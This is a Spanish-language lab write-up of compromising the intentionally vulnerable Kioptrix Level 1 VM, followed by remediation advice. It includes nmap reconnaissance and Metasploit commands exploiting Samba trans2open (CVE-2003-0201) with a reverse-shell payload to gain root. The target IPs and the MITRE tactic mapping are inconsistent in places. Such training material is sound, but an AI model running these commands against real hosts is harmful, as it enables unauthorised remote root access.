Kioptrix Level 1: Auditoría y Explotación de Vulnerabilidades de Espectro Completo
🏛️ Objetivo Profesional
El objetivo era realizar una prueba de penetración estructurada en el entorno Kioptrix Level 1 para lograr el compromiso total de 'root' y documentar estrategias técnicas de remediación adecuadas tanto para operaciones de Red Team como de Blue Team.
🏗️ Reproducción del Entorno (Trasfondo del Hardware)
Los valores predeterminados de virtualización modernos a menudo fallan en kernels antiguos de 2010. Para arrancar y conectar esta máquina en red correctamente, se requirieron las siguientes configuraciones arquitectónicas específicas:
- Subtipo de SO: Linux / Red Hat (32-bit).
- Arquitectura de almacenamiento: Se cambió de SATA a controlador IDE para admitir el disco duro .vmdk heredado.
- Protocolo de red: Configurado como PCI FAST-III con un adaptador Host-only para permitir la comunicación interna con la máquina de ataque Kali Linux.
⚔️ Análisis Ofensivo (Ruta Red Team)
La explotación siguió un ciclo de vida manual de enumeración a explotación:
1. Descubrimiento y Reconocimiento
- Netdiscover: Se utilizó
netdiscover -r 192.168.184.4 para identificar la IP del objetivo.
- Escaneo Nmap: Identificó servicios como SSH (22), HTTP (80), RPC (111) y NetBIOS-SSN (139). Samba 2.2.1a fue marcado como el punto de entrada principal.
2. Explotación (Samba trans2open)
- Vulnerabilidad: CVE-2003-0201 (Desbordamiento de montón).
- Mapeo MITRE ATT&CK: - Táctica: Escalada de Privilegios (TA0004)
- Técnica: Explotación para Escalada de Privilegios (T1068)
- Protocolo de Metasploit:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- Resultado: Generó con éxito una shell inversa. El comando
whoami devolvió root.
Para proteger un entorno empresarial, son obligatorias las siguientes estrategias de Gestión de Vulnerabilidades (VM):
- Protocolo de parcheo: Actualice Samba a la última versión compatible (Samba 4.x). La vulnerabilidad en la función
call_trans2open está efectivamente parcheada en todas las versiones modernas.
- Endurecimiento de red: Implemente cortafuegos basados en host para restringir los puertos 139 y 445 únicamente a subredes internas de confianza.
- Estrategia de rol de VM: Esta remediación se enmarca en los ciclos estándar de Gestión de Vulnerabilidades en horario laboral, garantizando la estabilidad de la infraestructura.
📝 Evidencia Técnica y Registros Manuales
Las siguientes imágenes documentan la enumeración manual en vivo y la ejecución en la terminal:
Notas de Descubrimiento del Objetivo y de Arquitectura


Prueba de Acceso Root (Captura de Terminal)
Evidencia de Shell Root